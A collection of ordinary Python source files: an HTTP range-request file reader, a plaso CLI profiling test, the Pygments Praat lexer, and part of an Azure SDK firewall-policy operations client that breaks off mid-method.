A file-like object pointing to a remove HTTP(S) resource
Supports only reading, with read-ahead of a predermined block-size.
In the case that the server does not supply the filesize, only reading of
the complete file in one go is supported.
Parameters
----------
url: str
Full URL of the remote resource, including the protocol
session: requests.Session or None
All calls will be made within this session, to avoid restarting
connections where the server allows this
block_size: int or None
The amount of read-ahead to do, in bytes. Default is 5MB, or the value
configured for the FileSystem creating this file
kwargs: all other key-values are passed to reqeuests calls.
"""
def __init__(self, url, session=None, block_size=None, **kwargs):
self.url = url
self.kwargs = kwargs
self.loc = 0
self.session = session if session is not None else requests.Session()
self.blocksize = (block_size if block_size is not None
else DEFAULT_BLOCK_SIZE)
try:
self.size = file_size(url, self.session, allow_redirects=True,
**self.kwargs)
except (ValueError, requests.HTTPError):
# No size information - only allow read() and no seek()
self.size = None
self.cache = None
self.closed = False
self.start = None
self.end = None
def seek(self, where, whence=0):
"""Set file position
Parameters
----------
where: int
Location to set
whence: int (default 0)
If zero, set from start of file (value should be positive); if 1,
set relative to current position; if 2, set relative to end of file
(value shoulf be negative)
Returns the position.
"""
if self.size is None and (where, whence) not in [(0, 0), (0, 1)]:
raise ValueError('Cannot seek since size of file is not known')
if whence == 0:
nloc = where
elif whence == 1:
nloc = self.loc + where
elif whence == 2:
nloc = self.size + where
else:
raise ValueError('Whence must be in [1, 2, 3], but got %s' % whence)
if nloc < 0:
raise ValueError('Seek before start of file')
self.loc = nloc
return nloc
def tell(self):
"""Get current file byte position"""
return self.loc
def read(self, length=-1):
"""Read bytes from file
Parameters
----------
length: int
Read up to this many bytes. If negative, read all content to end of
file. If the server has not supplied the filesize, attempting to
read only part of the data will raise a ValueError.
"""
if length == 0:
# asked for no data, so supply no data and shortcut doing work
return b''
if self.size is None:
if length >= 0:
# asked for specific amount of data, but we don't know how
# much is available
raise ValueError('File size is unknown, must read all data')
else:
# asked for whole file
return self._fetch_all()
if length < 0 and self.loc == 0:
# size was provided, but asked for whole file, so shortcut
return self._fetch_all()
if length < 0 or self.loc + length > self.size:
end = self.size
else:
end = self.loc + length
if self.loc >= self.size:
# EOF (python files don't error, just return no data)
return b''
self. _fetch(self.loc, end)
data = self.cache[self.loc - self.start:end - self.start]
self.loc = end
return data
def _fetch(self, start, end):
"""Set new bounds for data cache and fetch data, if required"""
if self.start is None and self.end is None:
# First read
self.start = start
self.end = end + self.blocksize
self.cache = self._fetch_range(start, self.end)
elif start < self.start:
if self.end - end > self.blocksize:
self.start = start
self.end = end + self.blocksize
self.cache = self._fetch_range(self.start, self.end)
else:
new = self._fetch_range(start, self.start)
self.start = start
self.cache = new + self.cache
elif end > self.end:
if self.end > self.size:
return
if end - self.end > self.blocksize:
self.start = start
self.end = end + self.blocksize
self.cache = self._fetch_range(self.start, self.end)
else:
new = self._fetch_range(self.end, end + self.blocksize)
self.end = end + self.blocksize
self.cache = self.cache + new
def _fetch_all(self):
"""Read whole file in one shot, without caching
This is only called when size is None or position is still at zero,
and read() is called without a byte-count.
"""
r = self.session.get(self.url, **self.kwargs)
r.raise_for_status()
out = r.content
# set position to end of data; actually expect file might close shortly
l = len(out)
if l < self.blocksize:
# actually all data fits in one block, so cache
self.start = 0
self.end = l
self.cache = out
self.size = l
self.loc = len(out)
return out
def _fetch_range(self, start, end):
"""Download a block of data
The expectation is that the server returns only the requested bytes,
with HTTP code 206. If this is not the case, we first check the headers,
and then stream the output - if the data size is bigger than we
requested, an exception is raised.
"""
kwargs = self.kwargs.copy()
headers = self.kwargs.pop('headers', {})
headers['Range'] = 'bytes=%i-%i' % (start, end - 1)
r = self.session.get(self.url, headers=headers, stream=True, **kwargs)
r.raise_for_status()
if r.status_code == 206:
# partial content, as expected
return r.content
if 'Content-Length' in r.headers:
cl = int(r.headers['Content-Length'])
if cl <= end - start:
# data size OK
return r.content
else:
raise ValueError('Got more bytes (%i) than requested (%i)' % (
cl, end - start))
cl = 0
out = []
for chunk in r.iter_content(chunk_size=2 ** 20):
# data size unknown, let's see if it goes too big
if chunk:
out.append(chunk)
cl += len(chunk)
if cl > end - start:
raise ValueError(
'Got more bytes so far (>%i) than requested (%i)' % (
cl, end - start))
else:
break
return b''.join(out)
def __enter__(self):
self.loc = 0
return self
def __exit__(self, *args):
self.close()
def __iter__(self):
# no text lines here, use TextIOWrapper
raise NotImplementedError
def write(self):
raise NotImplementedError
def flush(self):
pass
def close(self):
self.closed = True
def seekable(self):
return True
def writable(self):
return False
def readable(self):
return True
def file_size(url, session, **kwargs):
"""Call HEAD on the server to get file size
Default operation is to explicitly allow redirects and use encoding
'identity' (no compression) to get the true size of the target.
"""
kwargs = kwargs.copy()
ar = kwargs.pop('allow_redirects', True)
head = kwargs.get('headers', {})
if 'Accept-Encoding' not in head:
head['Accept-Encoding'] = 'identity'
r = session.head(url, allow_redirects=ar, **kwargs)
r.raise_for_status()
if 'Content-Length' in r.headers:
return int(r.headers['Content-Length'])
else:
raise ValueError("Server did not supply size of %s" % url)
|
py | 1a38a9dc7ac77059d22ee812ffd5f4ef34dc1e11 | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""Tests for the profiling CLI arguments helper."""
from __future__ import unicode_literals
import argparse
import unittest
from plaso.cli import tools
from plaso.cli.helpers import profiling
from plaso.lib import errors
from tests import test_lib as shared_test_lib
from tests.cli import test_lib as cli_test_lib
class ProfilingArgumentsHelperTest(cli_test_lib.CLIToolTestCase):
"""Tests for the profiling CLI arguments helper."""
# pylint: disable=protected-access
_EXPECTED_OUTPUT = """\
usage: cli_helper.py [--profilers PROFILERS_LIST]
[--profiling_directory DIRECTORY]
[--profiling_sample_rate SAMPLE_RATE]
Test argument parser.
optional arguments:
--profilers PROFILERS_LIST
List of profilers to use by the tool. This is a comma
separated list where each entry is the name of a
profiler. Use "--profilers list" to list the available
profilers.
--profiling_directory DIRECTORY, --profiling-directory DIRECTORY
Path to the directory that should be used to store the
profiling sample files. By default the sample files
are stored in the current working directory.
--profiling_sample_rate SAMPLE_RATE, --profiling-sample-rate SAMPLE_RATE
Profiling sample rate (defaults to a sample every 1000
files).
"""
def testAddArguments(self):
"""Tests the AddArguments function."""
argument_parser = argparse.ArgumentParser(
prog='cli_helper.py', description='Test argument parser.',
add_help=False,
formatter_class=cli_test_lib.SortedArgumentsHelpFormatter)
profiling.ProfilingArgumentsHelper.AddArguments(argument_parser)
output = self._RunArgparseFormatHelp(argument_parser)
self.assertEqual(output, self._EXPECTED_OUTPUT)
def testParseOptions(self):
"""Tests the ParseOptions function."""
# pylint: disable=no-member
test_tool = tools.CLITool()
options = cli_test_lib.TestOptions()
options.profiling_sample_rate = '100'
profiling.ProfilingArgumentsHelper.ParseOptions(options, test_tool)
self.assertEqual(test_tool._profiling_sample_rate, 100)
with shared_test_lib.TempDirectory() as temp_directory:
options = cli_test_lib.TestOptions()
options.profilers = 'processing'
options.profiling_directory = temp_directory
profiling.ProfilingArgumentsHelper.ParseOptions(options, test_tool)
self.assertEqual(test_tool._profilers, set(['processing']))
self.assertEqual(test_tool._profiling_directory, temp_directory)
self.assertEqual(test_tool._profiling_sample_rate, 1000)
with self.assertRaises(errors.BadConfigObject):
options = cli_test_lib.TestOptions()
profiling.ProfilingArgumentsHelper.ParseOptions(options, None)
with self.assertRaises(errors.BadConfigOption):
options = cli_test_lib.TestOptions()
options.profilers = 'bogus'
profiling.ProfilingArgumentsHelper.ParseOptions(options, test_tool)
with self.assertRaises(errors.BadConfigOption):
options = cli_test_lib.TestOptions()
options.profiling_directory = '/bogus'
profiling.ProfilingArgumentsHelper.ParseOptions(options, test_tool)
with self.assertRaises(errors.BadConfigOption):
options = cli_test_lib.TestOptions()
options.profiling_sample_rate = 'a'
profiling.ProfilingArgumentsHelper.ParseOptions(options, test_tool)
with self.assertRaises(errors.BadConfigOption):
options = cli_test_lib.TestOptions()
options.profiling_sample_rate = 100
profiling.ProfilingArgumentsHelper.ParseOptions(options, test_tool)
if __name__ == '__main__':
unittest.main()
|
py | 1a38a9e8f75abbd74946ae4fca630d7dcf3316df | # -*- coding: utf-8 -*-
"""
pygments.lexers.praat
~~~~~~~~~~~~~~~~~~~~~
Lexer for Praat
:copyright: Copyright 2006-2017 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from pygments.lexer import RegexLexer, words, bygroups, include
from pygments.token import Name, Text, Comment, Keyword, String, Punctuation, Number, \
Operator
__all__ = ['PraatLexer']
class PraatLexer(RegexLexer):
"""
For `Praat <http://www.praat.org>`_ scripts.
.. versionadded:: 2.1
"""
name = 'Praat'
aliases = ['praat']
filenames = ['*.praat', '*.proc', '*.psc']
keywords = (
'if', 'then', 'else', 'elsif', 'elif', 'endif', 'fi', 'for', 'from', 'to',
'endfor', 'endproc', 'while', 'endwhile', 'repeat', 'until', 'select', 'plus',
'minus', 'demo', 'assert', 'stopwatch', 'nocheck', 'nowarn', 'noprogress',
'editor', 'endeditor', 'clearinfo',
)
functions_string = (
'backslashTrigraphsToUnicode', 'chooseDirectory', 'chooseReadFile',
'chooseWriteFile', 'date', 'demoKey', 'do', 'environment', 'extractLine',
'extractWord', 'fixed', 'info', 'left', 'mid', 'percent', 'readFile', 'replace',
'replace_regex', 'right', 'selected', 'string', 'unicodeToBackslashTrigraphs',
)
functions_numeric = (
'abs', 'appendFile', 'appendFileLine', 'appendInfo', 'appendInfoLine', 'arccos',
'arccosh', 'arcsin', 'arcsinh', 'arctan', 'arctan2', 'arctanh', 'barkToHertz',
'beginPause', 'beginSendPraat', 'besselI', 'besselK', 'beta', 'beta2',
'binomialP', 'binomialQ', 'boolean', 'ceiling', 'chiSquareP', 'chiSquareQ',
'choice', 'comment', 'cos', 'cosh', 'createDirectory', 'deleteFile',
'demoClicked', 'demoClickedIn', 'demoCommandKeyPressed',
'demoExtraControlKeyPressed', 'demoInput', 'demoKeyPressed',
'demoOptionKeyPressed', 'demoShiftKeyPressed', 'demoShow', 'demoWaitForInput',
'demoWindowTitle', 'demoX', 'demoY', 'differenceLimensToPhon', 'do', 'editor',
'endPause', 'endSendPraat', 'endsWith', 'erb', 'erbToHertz', 'erf', 'erfc',
'exitScript', 'exp', 'extractNumber', 'fileReadable', 'fisherP', 'fisherQ',
'floor', 'gaussP', 'gaussQ', 'hertzToBark', 'hertzToErb', 'hertzToMel',
'hertzToSemitones', 'imax', 'imin', 'incompleteBeta', 'incompleteGammaP', 'index',
'index_regex', 'invBinomialP', 'invBinomialQ', 'invChiSquareQ', 'invFisherQ',
'invGaussQ', 'invSigmoid', 'invStudentQ', 'length', 'ln', 'lnBeta', 'lnGamma',
'log10', 'log2', 'max', 'melToHertz', 'min', 'minusObject', 'natural', 'number',
'numberOfColumns', 'numberOfRows', 'numberOfSelected', 'objectsAreIdentical',
'option', 'optionMenu', 'pauseScript', 'phonToDifferenceLimens', 'plusObject',
'positive', 'randomBinomial', 'randomGauss', 'randomInteger', 'randomPoisson',
'randomUniform', 'real', 'readFile', 'removeObject', 'rindex', 'rindex_regex',
'round', 'runScript', 'runSystem', 'runSystem_nocheck', 'selectObject',
'selected', 'semitonesToHertz', 'sentencetext', 'sigmoid', 'sin', 'sinc',
'sincpi', 'sinh', 'soundPressureToPhon', 'sqrt', 'startsWith', 'studentP',
'studentQ', 'tan', 'tanh', 'variableExists', 'word', 'writeFile', 'writeFileLine',
'writeInfo', 'writeInfoLine',
)
functions_array = (
'linear', 'randomGauss', 'randomInteger', 'randomUniform', 'zero',
)
objects = (
'Activation', 'AffineTransform', 'AmplitudeTier', 'Art', 'Artword',
'Autosegment', 'BarkFilter', 'BarkSpectrogram', 'CCA', 'Categories',
'Cepstrogram', 'Cepstrum', 'Cepstrumc', 'ChebyshevSeries', 'ClassificationTable',
'Cochleagram', 'Collection', 'ComplexSpectrogram', 'Configuration', 'Confusion',
'ContingencyTable', 'Corpus', 'Correlation', 'Covariance',
'CrossCorrelationTable', 'CrossCorrelationTables', 'DTW', 'DataModeler',
'Diagonalizer', 'Discriminant', 'Dissimilarity', 'Distance', 'Distributions',
'DurationTier', 'EEG', 'ERP', 'ERPTier', 'EditCostsTable', 'EditDistanceTable',
'Eigen', 'Excitation', 'Excitations', 'ExperimentMFC', 'FFNet', 'FeatureWeights',
'FileInMemory', 'FilesInMemory', 'Formant', 'FormantFilter', 'FormantGrid',
'FormantModeler', 'FormantPoint', 'FormantTier', 'GaussianMixture', 'HMM',
'HMM_Observation', 'HMM_ObservationSequence', 'HMM_State', 'HMM_StateSequence',
'Harmonicity', 'ISpline', 'Index', 'Intensity', 'IntensityTier', 'IntervalTier',
'KNN', 'KlattGrid', 'KlattTable', 'LFCC', 'LPC', 'Label', 'LegendreSeries',
'LinearRegression', 'LogisticRegression', 'LongSound', 'Ltas', 'MFCC', 'MSpline',
'ManPages', 'Manipulation', 'Matrix', 'MelFilter', 'MelSpectrogram',
'MixingMatrix', 'Movie', 'Network', 'OTGrammar', 'OTHistory', 'OTMulti', 'PCA',
'PairDistribution', 'ParamCurve', 'Pattern', 'Permutation', 'Photo', 'Pitch',
'PitchModeler', 'PitchTier', 'PointProcess', 'Polygon', 'Polynomial',
'PowerCepstrogram', 'PowerCepstrum', 'Procrustes', 'RealPoint', 'RealTier',
'ResultsMFC', 'Roots', 'SPINET', 'SSCP', 'SVD', 'Salience', 'ScalarProduct',
'Similarity', 'SimpleString', 'SortedSetOfString', 'Sound', 'Speaker',
'Spectrogram', 'Spectrum', 'SpectrumTier', 'SpeechSynthesizer', 'SpellingChecker',
'Strings', 'StringsIndex', 'Table', 'TableOfReal', 'TextGrid', 'TextInterval',
'TextPoint', 'TextTier', 'Tier', 'Transition', 'VocalTract', 'VocalTractTier',
'Weight', 'WordList',
)
variables_numeric = (
'macintosh', 'windows', 'unix', 'praatVersion', 'pi', 'e', 'undefined',
)
variables_string = (
'praatVersion', 'tab', 'shellDirectory', 'homeDirectory',
'preferencesDirectory', 'newline', 'temporaryDirectory',
'defaultDirectory',
)
tokens = {
'root': [
(r'(\s+)(#.*?$)', bygroups(Text, Comment.Single)),
(r'^#.*?$', Comment.Single),
(r';[^\n]*', Comment.Single),
(r'\s+', Text),
(r'\bprocedure\b', Keyword, 'procedure_definition'),
(r'\bcall\b', Keyword, 'procedure_call'),
(r'@', Name.Function, 'procedure_call'),
include('function_call'),
(words(keywords, suffix=r'\b'), Keyword),
(r'(\bform\b)(\s+)([^\n]+)',
bygroups(Keyword, Text, String), 'old_form'),
(r'(print(?:line|tab)?|echo|exit|asserterror|pause|send(?:praat|socket)|'
r'include|execute|system(?:_nocheck)?)(\s+)',
bygroups(Keyword, Text), 'string_unquoted'),
(r'(goto|label)(\s+)(\w+)', bygroups(Keyword, Text, Name.Label)),
include('variable_name'),
include('number'),
(r'"', String, 'string'),
(words((objects), suffix=r'(?=\s+\S+\n)'), Name.Class, 'string_unquoted'),
(r'\b[A-Z]', Keyword, 'command'),
(r'(\.{3}|[)(,])', Punctuation),
],
'command': [
(r'( ?[\w()-]+ ?)', Keyword),
(r"'(?=.*')", String.Interpol, 'string_interpolated'),
(r'\.{3}', Keyword, ('#pop', 'old_arguments')),
(r':', Keyword, ('#pop', 'comma_list')),
(r'\s', Text, '#pop'),
],
'procedure_call': [
(r'\s+', Text),
(r'([\w.]+)(:|\s*\()',
bygroups(Name.Function, Text), '#pop'),
(r'([\w.]+)', Name.Function, ('#pop', 'old_arguments')),
],
'procedure_definition': [
(r'\s', Text),
(r'([\w.]+)(\s*?[(:])',
bygroups(Name.Function, Text), '#pop'),
(r'([\w.]+)([^\n]*)',
bygroups(Name.Function, Text), '#pop'),
],
'function_call': [
(words(functions_string, suffix=r'\$(?=\s*[:(])'), Name.Function, 'function'),
(words(functions_array, suffix=r'#(?=\s*[:(])'), Name.Function, 'function'),
(words(functions_numeric, suffix=r'(?=\s*[:(])'), Name.Function, 'function'),
],
'function': [
(r'\s+', Text),
(r':', Punctuation, ('#pop', 'comma_list')),
(r'\s*\(', Punctuation, ('#pop', 'comma_list')),
],
'comma_list': [
(r'(\s*\n\s*)(\.{3})', bygroups(Text, Punctuation)),
(r'(\s*[])\n])', Text, '#pop'),
(r'\s+', Text),
(r'"', String, 'string'),
(r'\b(if|then|else|fi|endif)\b', Keyword),
include('function_call'),
include('variable_name'),
include('operator'),
include('number'),
(r'[()]', Text),
(r',', Punctuation),
],
'old_arguments': [
(r'\n', Text, '#pop'),
include('variable_name'),
include('operator'),
include('number'),
(r'"', String, 'string'),
(r'[^\n]', Text),
],
'number': [
(r'\n', Text, '#pop'),
(r'\b\d+(\.\d*)?([eE][-+]?\d+)?%?', Number),
],
'object_attributes': [
(r'\.?(n(col|row)|[xy]min|[xy]max|[nd][xy])\b', Name.Builtin, '#pop'),
(r'(\.?(?:col|row)\$)(\[)',
bygroups(Name.Builtin, Text), 'variable_name'),
(r'(\$?)(\[)',
bygroups(Name.Builtin, Text), ('#pop', 'comma_list')),
],
'variable_name': [
include('operator'),
include('number'),
(words(variables_string, suffix=r'\$'), Name.Variable.Global),
(words(variables_numeric, suffix=r'\b'), Name.Variable.Global),
(r'\bObject_\w+', Name.Builtin, 'object_attributes'),
(words(objects, prefix=r'\b', suffix=r'_\w+'),
Name.Builtin, 'object_attributes'),
(r"\b(Object_)(')",
bygroups(Name.Builtin, String.Interpol),
('object_attributes', 'string_interpolated')),
(words(objects, prefix=r'\b', suffix=r"(_)(')"),
bygroups(Name.Builtin, Name.Builtin, String.Interpol),
('object_attributes', 'string_interpolated')),
(r'\.?_?[a-z][\w.]*(\$|#)?', Text),
(r'[\[\]]', Punctuation, 'comma_list'),
(r"'(?=.*')", String.Interpol, 'string_interpolated'),
],
'operator': [
(r'([+\/*<>=!-]=?|[&*|][&*|]?|\^|<>)', Operator),
(r'(?<![\w.])(and|or|not|div|mod)(?![\w.])', Operator.Word),
],
'string_interpolated': [
(r'\.?[_a-z][\w.]*[$#]?(?:\[[a-zA-Z0-9,]+\])?(:[0-9]+)?',
String.Interpol),
(r"'", String.Interpol, '#pop'),
],
'string_unquoted': [
(r'(\n\s*)(\.{3})', bygroups(Text, Punctuation)),
(r'\n', Text, '#pop'),
(r'\s', Text),
(r"'(?=.*')", String.Interpol, 'string_interpolated'),
(r"'", String),
(r"[^'\n]+", String),
],
'string': [
(r'(\n\s*)(\.{3})', bygroups(Text, Punctuation)),
(r'"', String, '#pop'),
(r"'(?=.*')", String.Interpol, 'string_interpolated'),
(r"'", String),
(r'[^\'"\n]+', String),
],
'old_form': [
(r'\s+', Text),
(r'(optionmenu|choice)([ \t]+\S+:[ \t]+)',
bygroups(Keyword, Text), 'number'),
(r'(option|button)([ \t]+)',
bygroups(Keyword, Text), 'string_unquoted'),
(r'(sentence|text)([ \t]+\S+)',
bygroups(Keyword, Text), 'string_unquoted'),
(r'(word)([ \t]+\S+[ \t]*)(\S+)?([ \t]+.*)?',
bygroups(Keyword, Text, String, Text)),
(r'(boolean)(\s+\S+\s*)(0|1|"?(?:yes|no)"?)',
bygroups(Keyword, Text, Name.Variable)),
# Ideally processing of the number would happend in the 'number'
# but that doesn't seem to work
(r'(real|natural|positive|integer)([ \t]+\S+[ \t]*)([+-]?)(\d+(?:\.\d*)?'
r'(?:[eE][-+]?\d+)?%?)',
bygroups(Keyword, Text, Operator, Number)),
(r'(comment)(\s+)',
bygroups(Keyword, Text), 'string_unquoted'),
(r'\bendform\b', Keyword, '#pop'),
]
}
|
py | 1a38aa10c79eb5a4a18e653b72df109dc75c9770 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class FirewallPoliciesOperations(object):
"""FirewallPoliciesOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2020_06_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def _delete_initial(
self,
resource_group_name, # type: str
firewall_policy_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-06-01"
accept = "application/json"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'firewallPolicyName': self._serialize.url("firewall_policy_name", firewall_policy_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/firewallPolicies/{firewallPolicyName}'} # type: ignore
def begin_delete(
self,
resource_group_name, # type: str
firewall_policy_name, # type: str
**kwargs # type: Any
):
# type: (...) -> LROPoller[None]
"""Deletes the specified Firewall Policy.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param firewall_policy_name: The name of the Firewall Policy.
:type firewall_policy_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_initial(
resource_group_name=resource_group_name,
firewall_policy_name=firewall_policy_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'firewallPolicyName': self._serialize.url("firewall_policy_name", firewall_policy_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/firewallPolicies/{firewallPolicyName}'} # type: ignore
def get(
self,
resource_group_name, # type: str
firewall_policy_name, # type: str
expand=None, # type: Optional[str]
**kwargs # type: Any
):
# type: (...) -> "_models.FirewallPolicy"
"""Gets the specified Firewall Policy.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param firewall_policy_name: The name of the Firewall Policy.
:type firewall_policy_name: str
:param expand: Expands referenced resources.
:type expand: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: FirewallPolicy, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2020_06_01.models.FirewallPolicy
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.FirewallPolicy"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-06-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'firewallPolicyName': self._serialize.url("firewall_policy_name", firewall_policy_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('FirewallPolicy', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/firewallPolicies/{firewallPolicyName}'} # type: ignore
def _create_or_update_initial(
self,
resource_group_name, # type: str
firewall_policy_name, # type: str
parameters, # type: "_models.FirewallPolicy"
**kwargs # type: Any
):
# type: (...) -> "_models.FirewallPolicy"
cls = kwargs.pop('cls', None) # type: ClsType["_models.FirewallPolicy"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-06-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'firewallPolicyName': self._serialize.url("firewall_policy_name", firewall_policy_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'FirewallPolicy')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('FirewallPolicy', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('FirewallPolicy', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/firewallPolicies/{firewallPolicyName}'} # type: ignore
def begin_create_or_update(
self,
resource_group_name, # type: str
firewall_policy_name, # type: str
parameters, # type: "_models.FirewallPolicy"
**kwargs # type: Any
):
# type: (...) -> LROPoller["_models.FirewallPolicy"]
"""Creates or updates the specified Firewall Policy.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param firewall_policy_name: The name of the Firewall Policy.
:type firewall_policy_name: str
:param parameters: Parameters supplied to the create or update Firewall Policy operation.
:type parameters: ~azure.mgmt.network.v2020_06_01.models.FirewallPolicy
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either FirewallPolicy or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2020_06_01.models.FirewallPolicy]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
